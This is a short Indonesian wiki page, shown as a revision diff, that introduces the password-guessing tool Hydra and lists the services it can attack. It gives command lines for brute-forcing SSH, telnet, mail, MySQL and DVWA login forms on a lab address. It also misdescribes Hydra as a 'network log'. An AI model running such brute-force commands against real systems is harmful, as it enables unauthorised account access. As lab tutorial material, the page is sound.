Difference between revisions of "Hydra"

From OnnoWiki
Jump to navigation Jump to search
Line 1: Line 1:
 +
Hydra adalah network log yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.
 +
 +
 
System yang di serang
 
System yang di serang
  

Revision as of 11:11, 7 February 2016

Hydra adalah network log yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.


System yang di serang

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird,
FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD,
HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3,
POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Contoh cara menggunakan

hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
hydra -L userlist.txt -P passwordlist.txt ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f telnet://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f pop3://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f imap://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f 192.168.0.80 mysql


Untuk DVWA

hydra -l admin -p password   http-get-form "/DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed"
hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form
hydra –L userlist.txt –P passwordlist.txt –e ns –t 32 –u –f –m /DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&Login=Login 192.168.0.80 http-post-form


Referensi

General usage and options

HTTP basic auth

HTTP form based auth

Multiple protocols

Telnet